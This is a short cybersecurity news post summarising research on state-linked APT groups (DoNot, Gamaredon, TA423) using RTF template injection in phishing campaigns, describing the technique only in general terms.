Posted on Leave a comment

DoNot APT Group Using A New Attack Method On Phishing Campaign.

Three different state-sponsored threat actors linked to China, India, and Russia have been spotted using a new RTF (aka Rich Text Format) template injection approach to distribute malware to targeted systems as part of their phishing operations.

Researchers reported that ,”RTF template injection is a new method that is suitable for malicious phishing attachments since it is straightforward and allows threat actors to retrieve malicious content from a remote URL using an RTF “.

An RTF file containing fake material is at the centre of the attack, and when opened, it can be changed to allow the retrieval of content, including malicious payloads, housed at an external URL. It uses the RTF template capabilities to use a hex editor to change a document’s formatting characteristics by specifying a URL resource instead of a file resource destination from which a remote payload can be obtained.

When the Office app has to create the content, attackers can send legitimate Office files—such as DOC, XLS, or PPT—to victims, which then load malicious code through the template function.

Template injection attacks have been around for a while, but they got more common in 2020, when “remote template injection” became a favoured approach among some APT organisations.

As early as February 2021, Proofpoint discovered Template injection RTF files linked to the APT groups DoNot Team, Gamaredon, and a Chinese-linked APT actor dubbed TA423, with the adversaries using the files to target entities in Pakistan, Sri Lanka, Ukraine, and those working in the deep water energy exploration sector in Malaysia via defense-themed and other country-specific lures.

DoNot and TA423, who used RTF documents with malicious templates as early as March this year, when DoNoT registered its first domains, before starting the first attacks a month later, were the first to exploit this technique.

Gamaredon, an organisation recently exposed by Ukraine to be operated by Russia’s FSB intelligence service, is the most recent APT to exploit this tactic, most prominently in an October operation that used RTF files made to seem like Ukrainian government papers.

Finally the researchers concluded that,“Hazard actors’ creativity in bringing this strategy to a new file format in RTFs signifies an expanded surface area of threat for companies around the world, While this strategy is presently used by a small number of sophisticated APT actors, its effectiveness paired with its ease of usage is expected to promote its adoption even farther throughout the threat landscape.”

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin

Leave a Reply